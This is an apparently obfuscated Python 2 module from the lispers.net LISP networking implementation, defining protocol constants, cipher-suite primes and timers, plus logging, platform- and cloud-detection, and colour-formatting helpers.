if 58 - 58: I1IiiI
if 53 - 53: i1IIi
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434
if 59 - 59: o0oOOo0O0Ooo
if 81 - 81: OoOoOO00 - OoOoOO00 . iII111i
if 73 - 73: I11i % i11iIiiIii - I1IiiI
if 7 - 7: O0 * i11iIiiIii * Ii1I + ooOoO0o % OoO0O00 - ooOoO0o
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9
if 39 - 39: Oo0Ooo * OOooOOo % OOooOOo - OoooooooOO + o0oOOo0O0Ooo - I11i
if 23 - 23: i11iIiiIii
if 30 - 30: o0oOOo0O0Ooo - i1IIi % II111iiii + I11i * iIii1I11I1II1
if 81 - 81: IiII % i1IIi . iIii1I11I1II1
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5
if 4 - 4: i11iIiiIii % OoO0O00 % i1IIi / IiII
lisp_map_reply_action_string = [ "no-action" , "native-forward" ,
"send-map-request" , "drop-action" , "policy-denied" , "auth-failure" ]
if 6 - 6: iII111i / I1IiiI % OOooOOo - I1IiiI
if 31 - 31: OOooOOo
if 23 - 23: I1Ii111 . IiII
if 92 - 92: OoOoOO00 + I1Ii111 * Ii1I % I1IiiI
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32
if 42 - 42: Oo0Ooo
if 76 - 76: I1IiiI * iII111i % I1Ii111
if 57 - 57: iIii1I11I1II1 - i1IIi / I1Ii111 - O0 * OoooooooOO % II111iiii
if 68 - 68: OoooooooOO * I11i % OoOoOO00 - IiII
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16
if 34 - 34: I1Ii111 . iIii1I11I1II1 * OoOoOO00 * oO0o / I1Ii111 / I1ii11iIi11i
if 78 - 78: Oo0Ooo - o0oOOo0O0Ooo / OoOoOO00
if 10 - 10: iII111i + Oo0Ooo * I1ii11iIi11i + iIii1I11I1II1 / I1Ii111 / I1ii11iIi11i
if 42 - 42: I1IiiI
LISP_MR_TTL = ( 24 * 60 )
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_GLEAN_TTL = 15
LISP_IGMP_TTL = 240
if 38 - 38: OOooOOo + II111iiii % ooOoO0o % OoOoOO00 - Ii1I / OoooooooOO
LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60
LISP_TEST_MR_INTERVAL = 60
LISP_MAP_NOTIFY_INTERVAL = 2
LISP_DDT_MAP_REQUEST_INTERVAL = 2
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15
LISP_MAP_REQUEST_RATE_LIMIT = 5
LISP_ICMP_TOO_BIG_RATE_LIMIT = 1
if 73 - 73: o0oOOo0O0Ooo * O0 - i11iIiiIii
LISP_RLOC_PROBE_TTL = 64
LISP_RLOC_PROBE_INTERVAL = 10
LISP_RLOC_PROBE_REPLY_WAIT = 15
if 85 - 85: Ii1I % iII111i + I11i / o0oOOo0O0Ooo . oO0o + OOooOOo
LISP_DEFAULT_DYN_EID_TIMEOUT = 15
LISP_NONCE_ECHO_INTERVAL = 10
LISP_IGMP_TIMEOUT_INTERVAL = 180
if 62 - 62: i11iIiiIii + i11iIiiIii - o0oOOo0O0Ooo
if 28 - 28: iII111i . iII111i % iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / iII111i
if 27 - 27: OoO0O00 + ooOoO0o - i1IIi
if 69 - 69: IiII - O0 % I1ii11iIi11i + i11iIiiIii . OoOoOO00 / OoO0O00
if 79 - 79: O0 * i11iIiiIii - IiII / IiII
if 48 - 48: O0
if 93 - 93: i11iIiiIii - I1IiiI * I1ii11iIi11i * I11i % O0 + OoooooooOO
if 25 - 25: IiII + Ii1I / ooOoO0o . o0oOOo0O0Ooo % O0 * OoO0O00
if 84 - 84: ooOoO0o % Ii1I + i11iIiiIii
if 28 - 28: Oo0Ooo + OoO0O00 * OOooOOo % oO0o . I11i % O0
if 16 - 16: I11i - iIii1I11I1II1 / I1IiiI . II111iiii + iIii1I11I1II1
if 19 - 19: OoO0O00 - Oo0Ooo . O0
if 60 - 60: II111iiii + Oo0Ooo
if 9 - 9: ooOoO0o * OoooooooOO - iIii1I11I1II1 + OoOoOO00 / OoO0O00 . OoO0O00
if 49 - 49: II111iiii
if 25 - 25: OoooooooOO - I1IiiI . I1IiiI * oO0o
if 81 - 81: iII111i + IiII
if 98 - 98: I1IiiI
if 95 - 95: ooOoO0o / ooOoO0o
if 30 - 30: I1ii11iIi11i + Oo0Ooo / Oo0Ooo % I1ii11iIi11i . I1ii11iIi11i
if 55 - 55: ooOoO0o - I11i + II111iiii + iII111i % Ii1I
if 41 - 41: i1IIi - I11i - Ii1I
if 8 - 8: OoO0O00 + I1Ii111 - o0oOOo0O0Ooo % Oo0Ooo % o0oOOo0O0Ooo * oO0o
if 9 - 9: Oo0Ooo - i11iIiiIii - OOooOOo * Ii1I + ooOoO0o
if 44 - 44: II111iiii
if 52 - 52: I1ii11iIi11i - Oo0Ooo + I1ii11iIi11i % o0oOOo0O0Ooo
if 35 - 35: iIii1I11I1II1
if 42 - 42: I1Ii111 . I1IiiI . i1IIi + OoOoOO00 + OOooOOo + I1IiiI
if 31 - 31: iII111i . OOooOOo - ooOoO0o . OoooooooOO / OoooooooOO
if 56 - 56: OoO0O00 / oO0o / i11iIiiIii + OoooooooOO - Oo0Ooo - I11i
if 21 - 21: O0 % IiII . I1IiiI / II111iiii + IiII
if 53 - 53: oO0o - I1IiiI - oO0o * iII111i
if 71 - 71: O0 - iIii1I11I1II1
if 12 - 12: OOooOOo / o0oOOo0O0Ooo
if 42 - 42: Oo0Ooo
if 19 - 19: oO0o % I1ii11iIi11i * iIii1I11I1II1 + I1IiiI
if 46 - 46: Oo0Ooo
if 1 - 1: iII111i
if 97 - 97: OOooOOo + iII111i + O0 + i11iIiiIii
if 77 - 77: o0oOOo0O0Ooo / OoooooooOO
if 46 - 46: o0oOOo0O0Ooo % iIii1I11I1II1 . iII111i % iII111i + i11iIiiIii
if 72 - 72: iIii1I11I1II1 * Ii1I % ooOoO0o / OoO0O00
if 35 - 35: ooOoO0o + i1IIi % I1ii11iIi11i % I11i + oO0o
if 17 - 17: i1IIi
if 21 - 21: Oo0Ooo
if 29 - 29: I11i / II111iiii / ooOoO0o * OOooOOo
if 10 - 10: I1Ii111 % IiII * IiII . I11i / Ii1I % OOooOOo
if 49 - 49: OoO0O00 / oO0o + O0 * o0oOOo0O0Ooo
if 28 - 28: ooOoO0o + i11iIiiIii / I11i % OoOoOO00 % Oo0Ooo - O0
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
if 54 - 54: i1IIi + II111iiii
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
if 83 - 83: I1ii11iIi11i - I1IiiI + OOooOOo
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
if 5 - 5: Ii1I
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
if 46 - 46: IiII
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
if 45 - 45: ooOoO0o
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
if 21 - 21: oO0o . I1Ii111 . OOooOOo / Oo0Ooo / I1Ii111
if 17 - 17: OOooOOo / OOooOOo / I11i
if 1 - 1: i1IIi . i11iIiiIii % OOooOOo
if 82 - 82: iIii1I11I1II1 + Oo0Ooo . iIii1I11I1II1 % IiII / Ii1I . Ii1I
if 14 - 14: o0oOOo0O0Ooo . OOooOOo . I11i + OoooooooOO - OOooOOo + IiII
if 9 - 9: Ii1I
if 59 - 59: I1IiiI * II111iiii . O0
if 56 - 56: Ii1I - iII111i % I1IiiI - o0oOOo0O0Ooo
def lisp_record_traceback ( * args ) :
if 51 - 51: O0 / ooOoO0o * iIii1I11I1II1 + I1ii11iIi11i + o0oOOo0O0Ooo
Oo0OO0000oooo = datetime . datetime . now ( ) . strftime ( "%m/%d/%y %H:%M:%S.%f" ) [ : - 3 ]
IIII1iII = open ( "./logs/lisp-traceback.log" , "a" )
IIII1iII . write ( "---------- Exception occurred: {} ----------\n" . format ( Oo0OO0000oooo ) )
try :
traceback . print_last ( file = IIII1iII )
except :
IIII1iII . write ( "traceback.print_last(file=fd) failed" )
if 28 - 28: i1IIi - iII111i
try :
traceback . print_last ( )
except :
print ( "traceback.print_last() failed" )
if 54 - 54: iII111i - O0 % OOooOOo
IIII1iII . close ( )
return
if 73 - 73: O0 . OoOoOO00 + I1IiiI - I11i % I11i . I11i
if 17 - 17: Ii1I - OoooooooOO % Ii1I . IiII / i11iIiiIii % iII111i
if 28 - 28: I11i
if 58 - 58: OoOoOO00
if 37 - 37: Oo0Ooo - iIii1I11I1II1 / I1ii11iIi11i
if 73 - 73: i11iIiiIii - IiII
if 25 - 25: OoooooooOO + IiII * I1ii11iIi11i
def lisp_set_exception ( ) :
sys . excepthook = lisp_record_traceback
return
if 92 - 92: I1IiiI + I11i + O0 / o0oOOo0O0Ooo + I1Ii111
if 18 - 18: ooOoO0o * OoOoOO00 . iII111i / I1ii11iIi11i / i11iIiiIii
if 21 - 21: oO0o / I1ii11iIi11i + Ii1I + OoooooooOO
if 91 - 91: i11iIiiIii / i1IIi + iII111i + ooOoO0o * i11iIiiIii
if 66 - 66: iIii1I11I1II1 % i1IIi - O0 + I11i * I1Ii111 . IiII
if 52 - 52: ooOoO0o + O0 . iII111i . I1ii11iIi11i . OoO0O00
if 97 - 97: I1IiiI / iII111i
def lisp_is_raspbian ( ) :
if ( platform . dist ( ) [ 0 ] != "debian" ) : return ( False )
return ( platform . machine ( ) in [ "armv6l" , "armv7l" ] )
if 71 - 71: II111iiii / i1IIi . I1ii11iIi11i % OoooooooOO . OoOoOO00
if 41 - 41: i1IIi * II111iiii / OoooooooOO . OOooOOo
if 83 - 83: iII111i . O0 / Oo0Ooo / OOooOOo - II111iiii
if 100 - 100: OoO0O00
if 46 - 46: OoOoOO00 / iIii1I11I1II1 % iII111i . iIii1I11I1II1 * iII111i
if 38 - 38: I1ii11iIi11i - iII111i / O0 . I1Ii111
if 45 - 45: I1Ii111
def lisp_is_ubuntu ( ) :
return ( platform . dist ( ) [ 0 ] == "Ubuntu" )
if 83 - 83: OoOoOO00 . OoooooooOO
if 58 - 58: i11iIiiIii + OoooooooOO % OoooooooOO / IiII / i11iIiiIii
if 62 - 62: OoO0O00 / I1ii11iIi11i
if 7 - 7: OoooooooOO . IiII
if 53 - 53: Ii1I % Ii1I * o0oOOo0O0Ooo + OoOoOO00
if 92 - 92: OoooooooOO + i1IIi / Ii1I * O0
if 100 - 100: ooOoO0o % iIii1I11I1II1 * II111iiii - iII111i
def lisp_is_fedora ( ) :
return ( platform . dist ( ) [ 0 ] == "fedora" )
if 92 - 92: ooOoO0o
if 22 - 22: Oo0Ooo % iII111i * I1ii11iIi11i / OOooOOo % i11iIiiIii * I11i
if 95 - 95: OoooooooOO - IiII * I1IiiI + OoOoOO00
if 10 - 10: o0oOOo0O0Ooo / i11iIiiIii
if 92 - 92: I11i . I1Ii111
if 85 - 85: I1ii11iIi11i . I1Ii111
if 78 - 78: ooOoO0o * I1Ii111 + iIii1I11I1II1 + iIii1I11I1II1 / I1Ii111 . Ii1I
def lisp_is_centos ( ) :
return ( platform . dist ( ) [ 0 ] == "centos" )
if 97 - 97: ooOoO0o / I1Ii111 % i1IIi % I1ii11iIi11i
if 18 - 18: iIii1I11I1II1 % I11i
if 95 - 95: ooOoO0o + i11iIiiIii * I1Ii111 - i1IIi * I1Ii111 - iIii1I11I1II1
if 75 - 75: OoooooooOO * IiII
if 9 - 9: IiII - II111iiii + O0 / iIii1I11I1II1 / i11iIiiIii
if 39 - 39: IiII * Oo0Ooo + iIii1I11I1II1 - IiII + OOooOOo
if 69 - 69: O0
def lisp_is_debian ( ) :
return ( platform . dist ( ) [ 0 ] == "debian" )
if 85 - 85: ooOoO0o / O0
if 18 - 18: o0oOOo0O0Ooo % O0 * I1ii11iIi11i
if 62 - 62: I1Ii111 . IiII . OoooooooOO
if 11 - 11: OOooOOo / I11i
if 73 - 73: i1IIi / i11iIiiIii
if 58 - 58: Oo0Ooo . II111iiii + oO0o - i11iIiiIii / II111iiii / O0
if 85 - 85: OoOoOO00 + OOooOOo
def lisp_is_debian_kali ( ) :
return ( platform . dist ( ) [ 0 ] == "Kali" )
if 10 - 10: IiII / OoO0O00 + OoOoOO00 / i1IIi
if 27 - 27: Ii1I
if 67 - 67: I1IiiI
if 55 - 55: I1ii11iIi11i - iII111i * o0oOOo0O0Ooo + OoOoOO00 * OoOoOO00 * O0
if 91 - 91: I1Ii111 - OOooOOo % iIii1I11I1II1 - OoooooooOO % ooOoO0o
if 98 - 98: OoO0O00 . OoO0O00 * oO0o * II111iiii * I1Ii111
if 92 - 92: Oo0Ooo
def lisp_is_macos ( ) :
return ( platform . uname ( ) [ 0 ] == "Darwin" )
if 40 - 40: OoOoOO00 / IiII
if 79 - 79: OoO0O00 - iIii1I11I1II1 + Ii1I - I1Ii111
if 93 - 93: II111iiii . I1IiiI - Oo0Ooo + OoOoOO00
if 61 - 61: II111iiii
if 15 - 15: i11iIiiIii % I1IiiI * I11i / I1Ii111
if 90 - 90: iII111i
if 31 - 31: OOooOOo + O0
def lisp_is_alpine ( ) :
return ( os . path . exists ( "/etc/alpine-release" ) )
if 87 - 87: ooOoO0o
if 45 - 45: OoO0O00 / OoooooooOO - iII111i / Ii1I % IiII
if 83 - 83: I1IiiI . iIii1I11I1II1 - IiII * i11iIiiIii
if 20 - 20: i1IIi * I1Ii111 + II111iiii % o0oOOo0O0Ooo % oO0o
if 13 - 13: Oo0Ooo
if 60 - 60: I1ii11iIi11i * I1IiiI
if 17 - 17: OOooOOo % Oo0Ooo / I1ii11iIi11i . IiII * OOooOOo - II111iiii
def lisp_is_x86 ( ) :
i1i1IIii1i1 = platform . machine ( )
return ( i1i1IIii1i1 in ( "x86" , "i686" , "x86_64" ) )
if 65 - 65: I1IiiI + OoOoOO00 / OOooOOo
if 83 - 83: o0oOOo0O0Ooo . iII111i - Oo0Ooo
if 65 - 65: iIii1I11I1II1 / ooOoO0o . IiII - II111iiii
if 72 - 72: iIii1I11I1II1 / IiII % iII111i % OOooOOo - I11i % OOooOOo
if 100 - 100: Oo0Ooo + i11iIiiIii
if 71 - 71: I11i / o0oOOo0O0Ooo / I1Ii111 % OOooOOo
if 51 - 51: IiII * O0 / II111iiii . Ii1I % OOooOOo / I1IiiI
def lisp_is_linux ( ) :
return ( platform . uname ( ) [ 0 ] == "Linux" )
if 9 - 9: I1IiiI % I1IiiI % II111iiii
if 30 - 30: IiII + I1Ii111 - IiII . IiII - II111iiii + O0
if 86 - 86: i1IIi
if 41 - 41: OoOoOO00 * I11i / OoOoOO00 % oO0o
if 18 - 18: II111iiii . OoooooooOO % OoOoOO00 % Ii1I
if 9 - 9: OoO0O00 - Oo0Ooo * OoooooooOO . Oo0Ooo
if 2 - 2: OoooooooOO % OOooOOo
def lisp_on_aws ( ) :
oOoOOo0oo0 = commands . getoutput ( "sudo dmidecode -s bios-version" )
return ( oOoOOo0oo0 . lower ( ) . find ( "amazon" ) != - 1 )
if 60 - 60: ooOoO0o * I1Ii111 + Oo0Ooo
if 19 - 19: OoO0O00 * I11i / I11i . OoooooooOO - OOooOOo + i11iIiiIii
if 88 - 88: i11iIiiIii - ooOoO0o
if 67 - 67: OOooOOo . Oo0Ooo + OoOoOO00 - OoooooooOO
if 70 - 70: OOooOOo / II111iiii - iIii1I11I1II1 - iII111i
if 11 - 11: iIii1I11I1II1 . OoooooooOO . II111iiii / i1IIi - I11i
if 30 - 30: OoOoOO00
def lisp_on_gcp ( ) :
oOoOOo0oo0 = commands . getoutput ( "sudo dmidecode -s bios-version" )
return ( oOoOOo0oo0 . lower ( ) . find ( "google" ) != - 1 )
if 21 - 21: i11iIiiIii / I1Ii111 % OOooOOo * O0 . I11i - iIii1I11I1II1
if 26 - 26: II111iiii * OoOoOO00
if 10 - 10: II111iiii . iII111i
if 32 - 32: Ii1I . IiII . OoooooooOO - OoO0O00 + oO0o
if 88 - 88: iII111i
if 19 - 19: II111iiii * IiII + Ii1I
if 65 - 65: OOooOOo . I1Ii111 . OoO0O00 . iII111i - OOooOOo
if 19 - 19: i11iIiiIii + iII111i % ooOoO0o
def lisp_process_logfile ( ) :
IIi = "./logs/lisp-{}.log" . format ( lisp_log_id )
if ( os . path . exists ( IIi ) ) : return
if 27 - 27: OOooOOo % Ii1I
sys . stdout . close ( )
sys . stdout = open ( IIi , "a" )
if 58 - 58: OOooOOo * o0oOOo0O0Ooo + O0 % OOooOOo
lisp_print_banner ( bold ( "logfile rotation" , False ) )
return
if 25 - 25: Oo0Ooo % I1ii11iIi11i * ooOoO0o
if 6 - 6: iII111i . IiII * OoOoOO00 . i1IIi
if 98 - 98: i1IIi
if 65 - 65: OoOoOO00 / OoO0O00 % IiII
if 45 - 45: OoOoOO00
if 66 - 66: OoO0O00
if 56 - 56: O0
if 61 - 61: o0oOOo0O0Ooo / OOooOOo / Oo0Ooo * O0
def lisp_i_am ( name ) :
global lisp_log_id , lisp_i_am_itr , lisp_i_am_etr , lisp_i_am_rtr
global lisp_i_am_mr , lisp_i_am_ms , lisp_i_am_ddt , lisp_i_am_core
global lisp_hostname
if 23 - 23: oO0o - OOooOOo + I11i
lisp_log_id = name
if ( name == "itr" ) : lisp_i_am_itr = True
if ( name == "etr" ) : lisp_i_am_etr = True
if ( name == "rtr" ) : lisp_i_am_rtr = True
if ( name == "mr" ) : lisp_i_am_mr = True
if ( name == "ms" ) : lisp_i_am_ms = True
if ( name == "ddt" ) : lisp_i_am_ddt = True
if ( name == "core" ) : lisp_i_am_core = True
if 12 - 12: I1IiiI / ooOoO0o % o0oOOo0O0Ooo / i11iIiiIii % OoooooooOO
if 15 - 15: iIii1I11I1II1 % OoooooooOO - Oo0Ooo * Ii1I + I11i
if 11 - 11: iII111i * Ii1I - OoOoOO00
if 66 - 66: OoOoOO00 . i11iIiiIii - iII111i * o0oOOo0O0Ooo + OoooooooOO * I1ii11iIi11i
if 74 - 74: Oo0Ooo
lisp_hostname = socket . gethostname ( )
OO000o00 = lisp_hostname . find ( "." )
if ( OO000o00 != - 1 ) : lisp_hostname = lisp_hostname [ 0 : OO000o00 ]
return
if 46 - 46: OoO0O00
if 71 - 71: I11i / I11i * oO0o * oO0o / II111iiii
if 35 - 35: OOooOOo * o0oOOo0O0Ooo * I1IiiI % Oo0Ooo . OoOoOO00
if 58 - 58: I11i + II111iiii * iII111i * i11iIiiIii - iIii1I11I1II1
if 68 - 68: OoooooooOO % II111iiii
if 26 - 26: II111iiii % i11iIiiIii % iIii1I11I1II1 % I11i * I11i * I1ii11iIi11i
if 24 - 24: II111iiii % I1Ii111 - ooOoO0o + I1IiiI * I1ii11iIi11i
if 2 - 2: Ii1I - IiII
if 83 - 83: oO0o % o0oOOo0O0Ooo % Ii1I - II111iiii * OOooOOo / OoooooooOO
def lprint ( * args ) :
IIIiIi = ( "force" in args )
if ( lisp_debug_logging == False and IIIiIi == False ) : return
if 34 - 34: OoooooooOO . O0 / oO0o * OoOoOO00 - I1ii11iIi11i
lisp_process_logfile ( )
Oo0OO0000oooo = datetime . datetime . now ( ) . strftime ( "%m/%d/%y %H:%M:%S.%f" )
Oo0OO0000oooo = Oo0OO0000oooo [ : - 3 ]
print "{}: {}:" . format ( Oo0OO0000oooo , lisp_log_id ) ,
if 36 - 36: i1IIi / O0 / OoO0O00 - O0 - i1IIi
for ii1I11 in args :
if ( ii1I11 == "force" ) : continue
print ii1I11 ,
if 99 - 99: OOooOOo
print ""
if 45 - 45: oO0o - OOooOOo * I1Ii111 / Oo0Ooo * II111iiii - I1Ii111
try : sys . stdout . flush ( )
except : pass
return
if 83 - 83: OoO0O00 % IiII . OoooooooOO
if 52 - 52: ooOoO0o / i11iIiiIii - OOooOOo . IiII % iIii1I11I1II1 + o0oOOo0O0Ooo
if 71 - 71: oO0o % I11i * OoOoOO00 . O0 / Ii1I . I1ii11iIi11i
if 58 - 58: Oo0Ooo / oO0o
if 44 - 44: OOooOOo
if 54 - 54: Ii1I - I11i - I1Ii111 . iIii1I11I1II1
if 79 - 79: Ii1I . OoO0O00
if 40 - 40: o0oOOo0O0Ooo + Oo0Ooo . o0oOOo0O0Ooo % ooOoO0o
def dprint ( * args ) :
if ( lisp_data_plane_logging ) : lprint ( * args )
return
if 15 - 15: Ii1I * Oo0Ooo % I1ii11iIi11i * iIii1I11I1II1 - i11iIiiIii
if 60 - 60: I1IiiI * I1Ii111 % OoO0O00 + oO0o
if 52 - 52: i1IIi
if 84 - 84: Ii1I / IiII
if 86 - 86: OoOoOO00 * II111iiii - O0 . OoOoOO00 % iIii1I11I1II1 / OOooOOo
if 11 - 11: I1IiiI * oO0o + I1ii11iIi11i / I1ii11iIi11i
if 37 - 37: i11iIiiIii + i1IIi
if 23 - 23: iII111i + I11i . OoOoOO00 * I1IiiI + I1ii11iIi11i
def debug ( * args ) :
lisp_process_logfile ( )
if 18 - 18: IiII * o0oOOo0O0Ooo . IiII / O0
Oo0OO0000oooo = datetime . datetime . now ( ) . strftime ( "%m/%d/%y %H:%M:%S.%f" )
Oo0OO0000oooo = Oo0OO0000oooo [ : - 3 ]
if 8 - 8: o0oOOo0O0Ooo
print red ( ">>>" , False ) ,
print "{}:" . format ( Oo0OO0000oooo ) ,
for ii1I11 in args : print ii1I11 ,
print red ( "<<<\n" , False )
try : sys . stdout . flush ( )
except : pass
return
if 4 - 4: I1ii11iIi11i + I1ii11iIi11i * ooOoO0o - OoOoOO00
if 78 - 78: Ii1I / II111iiii % OoOoOO00
if 52 - 52: OOooOOo - iII111i * oO0o
if 17 - 17: OoooooooOO + OOooOOo * I11i * OoOoOO00
if 36 - 36: O0 + Oo0Ooo
if 5 - 5: Oo0Ooo * OoOoOO00
if 46 - 46: ooOoO0o
def lisp_print_banner ( string ) :
global lisp_version , lisp_hostname
if 33 - 33: iII111i - II111iiii * OoooooooOO - Oo0Ooo - OOooOOo
if ( lisp_version == "" ) :
lisp_version = commands . getoutput ( "cat lisp-version.txt" )
if 84 - 84: I1Ii111 + Oo0Ooo - OoOoOO00 * OoOoOO00
Ooo = bold ( lisp_hostname , False )
lprint ( "lispers.net LISP {} {}, version {}, hostname {}" . format ( string ,
datetime . datetime . now ( ) , lisp_version , Ooo ) )
return
if 65 - 65: Oo0Ooo / I11i
if 12 - 12: I11i % OoOoOO00
if 48 - 48: iII111i . i11iIiiIii
if 5 - 5: oO0o . I1ii11iIi11i . II111iiii . OoooooooOO
if 96 - 96: i11iIiiIii - OOooOOo % O0 / OoO0O00
if 100 - 100: iII111i / Ii1I - OoooooooOO % II111iiii - I1IiiI % OoOoOO00
if 60 - 60: iIii1I11I1II1 + i1IIi
def green ( string , html ) :
if ( html ) : return ( '<font color="green"><b>{}</b></font>' . format ( string ) )
return ( bold ( "\033[92m" + string + "\033[0m" , html ) )
if 86 - 86: iIii1I11I1II1 + OoOoOO00 . i11iIiiIii - Ii1I
if 51 - 51: OoOoOO00
if 14 - 14: IiII % oO0o % Oo0Ooo - i11iIiiIii
if 53 - 53: Ii1I % Oo0Ooo
if 59 - 59: OOooOOo % iIii1I11I1II1 . i1IIi + II111iiii * IiII
if 41 - 41: Ii1I % I1ii11iIi11i
if 12 - 12: OOooOOo
def green_last_sec ( string ) :
return ( green ( string , True ) )
if 69 - 69: OoooooooOO + OOooOOo
if 26 - 26: Oo0Ooo + OOooOOo / OoO0O00 % OoOoOO00 % I1ii11iIi11i + II111iiii
if 31 - 31: I11i % OOooOOo * I11i
if 45 - 45: i1IIi . I1IiiI + OOooOOo - OoooooooOO % ooOoO0o
if 1 - 1: iIii1I11I1II1
if 93 - 93: i1IIi . i11iIiiIii . Oo0Ooo
if 99 - 99: I11i - I1Ii111 - oO0o % OoO0O00
def green_last_min ( string ) :
return ( '<font color="#58D68D"><b>{}</b></font>' . format ( string ) )
if 21 - 21: II111iiii % I1ii11iIi11i . i1IIi - OoooooooOO
if 4 - 4: OoooooooOO . ooOoO0o
if 78 - 78: I1ii11iIi11i + I11i - O0
if 10 - 10: I1Ii111 % I1IiiI
if 97 - 97: OoooooooOO - I1Ii111
if 58 - 58: iIii1I11I1II1 + O0
if 30 - 30: ooOoO0o % iII111i * OOooOOo - I1ii11iIi11i * Ii1I % ooOoO0o
def red ( string , html ) :
if ( html ) : return ( '<font color="red"><b>{}</b></font>' . format ( string ) )
return ( bold ( "\033[91m" + string + "\033[0m" , html ) )
if 46 - 46: i11iIiiIii - O0 . oO0o
if 100 - 100: I1IiiI / o0oOOo0O0Ooo * iII111i . O0 / OOooOOo
if 83 - 83: I1Ii111
if 48 - 48: II111iiii * OOooOOo * I1Ii111
if 50 - 50: IiII % i1IIi
if 21 - 21: OoooooooOO - iIii1I11I1II1
if 93 - 93: oO0o - o0oOOo0O0Ooo % OoOoOO00 . OoOoOO00 - ooOoO0o
def blue ( string , html ) :
if ( html ) : return ( '<font color="blue"><b>{}</b></font>' . format ( string ) )
return ( bold ( "\033[94m" + string + "\033[0m" , html ) )
if 90 - 90: ooOoO0o + II111iiii * I1ii11iIi11i / Ii1I . o0oOOo0O0Ooo + o0oOOo0O0Ooo
if 40 - 40: ooOoO0o / OoOoOO00 % i11iIiiIii % I1ii11iIi11i / I1IiiI
if 62 - 62: i1IIi - OoOoOO00
if 62 - 62: i1IIi + Oo0Ooo % IiII
if 28 - 28: I1ii11iIi11i . i1IIi
if 10 - 10: OoO0O00 / Oo0Ooo
if 15 - 15: iII111i . OoOoOO00 / iII111i * I11i - I1IiiI % I1ii11iIi11i
def bold ( string , html ) :
if ( html ) : return ( "<b>{}</b>" . format ( string ) )
return ( "\033[1m" + string + "\033[0m" )
if 57 - 57: O0 % OoOoOO00 % oO0o
if 45 - 45: I1ii11iIi11i + II111iiii * i11iIiiIii
if 13 - 13: OoooooooOO * oO0o - Ii1I / OOooOOo + I11i + IiII
if 39 - 39: iIii1I11I1II1 - OoooooooOO
